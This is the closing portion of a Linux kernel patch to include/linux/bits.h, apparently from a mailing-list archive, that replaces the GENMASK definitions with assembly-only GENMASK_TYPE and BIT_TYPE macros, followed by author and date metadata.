-#define GENMASK(h, l) __GENMASK(h, l)
-#define GENMASK_ULL(h, l) __GENMASK_ULL(h, l)
-#endif /* !defined(__ASSEMBLY__) */
+#define GENMASK_TYPE(t, h, l) ((2 << (h)) - (1 << (l)))
+#define BIT_TYPE(type, nr) (1 << (nr))
+
+#endif /* defined(__ASSEMBLY__) */
#endif /* __LINUX_BITS_H */
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:27 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.